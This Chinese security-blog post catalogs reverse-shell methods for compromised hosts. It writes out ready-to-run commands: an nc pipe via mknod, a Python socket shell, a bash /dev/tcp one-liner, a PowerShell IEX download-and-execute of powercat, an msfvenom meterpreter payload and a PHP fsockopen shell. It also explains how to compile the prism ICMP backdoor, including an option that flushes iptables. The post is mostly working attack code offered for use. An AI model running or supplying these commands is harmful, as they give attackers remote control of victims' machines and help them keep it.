查看原文
其他

常用内网反弹shell方法一览

伟大宝宝 乌雲安全 2022-10-19

本次整理了一些常用的反弹shell手段,供各位参考。



通过mknod创建管道反弹shell

在linux下的nc中我们使用-e来反弹shell的时候会发现不存在-e参数。


在这种情况下可以通过创建管道,然后将默认shell环境的输入重定向给刚才创建的管道,最后将输出重定向到管道中。

mknod /tmp/bmz p/bin/bash 0</tmp/bmz | nc 192.168.88.131 1234 1>/tmp/bmz

我们已经可以接收到反弹的shell


通过Python反弹shell同样我们也可以尝试使用python,因为linux默认安装了python编写脚本
import socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "192.168.88.131" , 1234 ))os.dup2(s.fileno(), 0 )os.dup2(s.fileno(), 1 )os.dup2(s.fileno(), 2 )p = subprocess.call([ "/bin/bash" , "-i" ])运行即可接收到shell


通过bash反弹shell这是最为常用的一个反弹的方法
bash -i >& /dev/tcp/ip_address/port 0>&1


通过ICMP反弹shell

如果目标对流量协议进行了限制,也可以尝试采用ICMP协议进行反弹shell。因为通常情况下不会对ICMP协议进行封禁。

首先下载prism(公众号首页回复:“prism”获取下载地址)

下载完后会有这几个文件

其中prism.c是我们需要编译的后门文件,sendPacket.py用来触发后门,但是后门文件在我们编译前需要进行一下配置。

重点关注这几行

其中

define REVERSE_HOST用来设置监听主机的IP地址define REVERSE_PORT用来设置监听的端口

设置好以后上传到目标主机进行编译

编译的命令:

gcc <..OPTIONS..> -Wall -s -o prism prism.c

其中OPTIONS包含以下选项

-DDETACH //后台运行-DSTATIC          //只用STATIC模式(默认是ICMP模式)-DNORENAME   //不再重命名进程名-DIPTABLES     //清除所有iptables规则表项

使用

gcc -DDETACH -Wall -s -o prism prism.c

编译后门

之后运行编译好的后门文件。

然后去运行

这个时候去运行我们的sendPacket.py

监听主机便会获取到反弹的shell


PowerShell反弹shellWindows下的powercat反弹shell下载powercat(公众号回复:“powercat”下载)命令格式
powershell IEX (New-ObjectSystem.Net.Webclient).DownloadString('http://192.168.1.38/powercat.ps1'); powercat -c ip_addr -p port -e cmd
监听端获得反弹的shell


MSF生成后门反弹shellmsf以及CS的反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe生成木马后使用exploit/multi/handler模块监听,选择对应后门的payload,配置好参数后开启监听。在目标服务器运行生成的后门文件后就可以上线。


通过Cobaltstrike反弹shell比较简单直接截图生成后门后上传到目标主机,运行后即可上线。通过PHP反弹shell命令如下
php -r '$sock=fsockopen("192.168.1.38",1234);exec("/bin/sh -i <&3 >&3 2>&3");'加个好友进技术交流群请备注:进群推荐阅读

欢迎 在看留言分享至朋友圈 三连


 好文推荐  


您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存